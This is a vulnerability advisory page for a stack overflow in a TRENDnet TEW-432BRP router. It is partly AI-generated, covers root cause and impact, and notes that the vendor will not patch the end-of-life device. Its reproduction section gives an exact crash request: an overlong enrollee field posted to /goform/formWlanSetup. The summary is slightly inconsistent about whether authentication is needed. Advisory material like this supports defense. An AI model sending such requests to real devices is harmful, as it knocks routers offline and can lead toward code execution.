CVE-2026-10183
Description
Stack-based buffer overflow in TRENDnet TEW-432BRP router's formWlanSetup function allows remote unauthenticated attackers to execute arbitrary code via a crafted enrollee parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stack-based buffer overflow in TRENDnet TEW-432BRP router's formWlanSetup function allows remote unauthenticated attackers to execute arbitrary code via a crafted enrollee parameter.
Vulnerability
The TRENDnet TEW-432BRP router firmware version 3.10B20 is vulnerable to a stack-based buffer overflow in the /goform/formWlanSetup endpoint. The enrollee parameter is copied to a stack buffer without length validation, causing overflow. This affects the formWlanSetup function in the boa binary. [1]
Exploitation
An unauthenticated attacker can send a crafted POST request to http:///goform/formWlanSetup with an overly long enrollee value. The overflow overwrites the return address, enabling arbitrary code execution. A proof-of-concept that crashes the router is publicly available. [1]
Impact
Successful exploitation allows remote attackers to execute arbitrary code on the router, likely with root privileges, leading to full device compromise. This could result in data theft, network eavesdropping, or further attacks on internal networks.
Mitigation
The product has been end-of-life since 2009 and is no longer supported. TRENDnet has stated they cannot replicate or fix the vulnerability. Users should replace the device with a supported model. There is no available patch. [1]
AI Insight generated on May 31, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: = 3.10B20
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input length validation in the formWlanSetup function allows an unbounded stack copy of the enrollee parameter, causing a stack-based buffer overflow."
Attack vector
An unauthenticated remote attacker sends a crafted HTTP POST request to `/goform/formWlanSetup` with an overly long `enrollee` parameter in the form body [ref_id=1]. The attacker must have network access to the router's web interface (typically on port 80) and can supply the payload via a standard browser or scripting tool [ref_id=1]. Because the input is copied unchecked onto the stack, the long string overwrites the return address, enabling arbitrary code execution [ref_id=1].
Affected code
The vulnerability resides in the `formWlanSetup` function within the file `/goform/formWlanSetup` of the boa binary on the TRENDnet TEW-432BRP router (firmware version 3.10B20) [ref_id=1]. The function copies the attacker-supplied `enrollee` parameter directly into a stack-based local variable without any length checking [ref_id=1].
What the fix does
No patch is available. The vendor states the product has been end-of-life since 2009 and will not replicate or fix any vulnerabilities [ref_id=1]. The researcher recommends that string content should be validated at the input extraction stage to prevent the unbounded copy that leads to stack overflow [ref_id=1]. Users of this unsupported device should replace it with a supported product.
Preconditions
- networkNetwork access to the router's web interface (typically port 80)
- authNo authentication required (the PoC uses Basic auth but the advisory does not state authentication is a precondition)
Reproduction
Send an HTTP POST request to `http://<router-ip>/goform/formWlanSetup` with `Content-Type: application/x-www-form-urlencoded` and a body containing `setPIN=Start+PIN&enrollee=` followed by a long string of `a` characters (e.g., 847 bytes total) and `&webpage=wlan_wps.asp` [ref_id=1]. The router will crash and become unresponsive [ref_id=1].
Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.